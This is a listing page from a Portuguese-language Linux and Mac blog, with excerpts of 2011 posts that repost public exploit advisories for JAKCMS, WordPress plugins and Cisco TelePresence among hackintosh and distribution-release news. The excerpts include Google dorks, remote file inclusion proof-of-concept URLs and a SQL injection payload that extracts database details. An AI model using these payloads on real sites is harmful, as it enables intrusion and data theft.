Skip to content
AppUnix

Categoria: Blog

Nosso Blog

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

23/09/2011 by little_oak

# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 Fonte: http://www.exploit-db.com/exploits/17882/

Continue Reading

Multiple WordPress Plugin timthumb.php Vulnerabilites

23/09/2011 by little_oak

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) — Description — The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com …

Continue Reading

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011 by little_oak

Sense of Security – Security Advisory – SOS-11-010 Release Date. 19-Sep-2011 Last Update. – Vendor Notification Date. 21-Feb-2011 Product. Cisco TelePresence Series Platform. Cisco Affected versions. C < = TC4.1.2, MXP

Continue Reading

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI — Vulnerable Code — // Move folder request handled when called by GET AJAX if (isset($_GET[‘ru_folder’])) { // WP setup …

Continue Reading

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 by little_oak

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { …

Continue Reading

P5KPL-AM SE updates no lion 10.7.1 current ocorreram muito bem no hackintosh

21/09/2011 by little_oak

Boa noite grandes mestres, só estamos postando esta informação extra para deixar o coração dos amantes de hackintosh mais tranquilizados. Fizemos, neste instante todas as updates disponíveis pela apple na arquitetura 10.7.1 (current) em cima do seguinte hardware: Cpu – 2160 (intel dual core), 2 gb de ram ddr 800, VGA nvidia 8500gt, P5KPL-AM SE …

Continue Reading

Itens básicos para entrar no mundo Hackintosh

19/09/2011 by Shell

Olá galera… tudo na paz? Vixe, muito tempo sem escrever aqui galera….. Mas é por uma nobre causa….. tenho me esforçado ao máximo para adquirir conhecimentos que facilitem as explicações e melhorem os artigos a vocês  nossos leitores….. hoje eu queria esclarecer alguns aspectos que considero fundamentais ao entusiastas ao mundo hackintosh….. Não quero ser …

Continue Reading

Lançado FreeBSD 9.0-BETA2

15/09/2011 by little_oak

Ken Smith has announced the availability of the second beta of FreeBSD 9.0, more than a month later than planned: “The second beta build of the 9.0-RELEASE release cycle is now available. Note: the location of the FTP install tree and ISOs have changed slightly. What we used for BETA2 reflects a directory structure that …

Continue Reading

openSUSE 12.1 Milestone 5 Lançado

06/09/2011 by little_oak

    Bryen Yunashko has announced the availability of the third milestone release of openSUSE 12.1: “openSUSE 12.1’s milestone 5 is now ready for download. Here are some interesting things you can expect to see when you try milestone 5: further changes have been made to systemd which replaces the SysInitV system, the default is …

Continue Reading

WordPress yolink Search plugin <= 1.1.4 SQL Injection

06/09/2011 by little_oak

# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] …

Continue Reading

Navegação por posts

  • Previous
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • …
  • 20
  • Next

Pesquisa

Publicidade

Categorias

  • Blog
  • cPanel
  • How Tos
  • Linux
  • Mac Os
  • MySQL
  • Wordpress

#Apoiadores

Patrocinador

Registre-se e ganhe $25



© 2021 AppUnix | Protegido Por MxGuardDoG